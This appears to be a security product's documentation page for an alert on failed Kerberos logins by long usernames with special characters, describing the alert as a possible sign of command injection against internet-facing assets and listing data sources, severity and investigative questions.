Failed Login for a Long Username with Special Characters

The
Failed Login For a Long Username With Special Characters
alert indicates a user account with a long name (more than 15 characters) and containing special characters tried to log in to the domain and failed, because it does not appear in the Kerberos database.

Synopsis

10 minutes
3 days
14 days
10 min
Traffic and Enhanced Application logs, or Windows event logs via WEC.
Severity
High

Description

A user account with a long name (more than 15 characters) and containing special characters tried to log in to the domain and failed, because it does not appear in the Kerberos database. This may be indicative of exploitation attempts (e.g. command injection) on internet-facing assets which leverage Kerberos authentication.

Attacker's Goals

An attacker is trying to get code execution on internet-facing assets through command injection.

Investigative Actions

Check the host and/or user triggering these failed attempts:
  • Is the host running internet-facing services?
  • Are we looking at sanction vulnerability scanning?

Recommended For You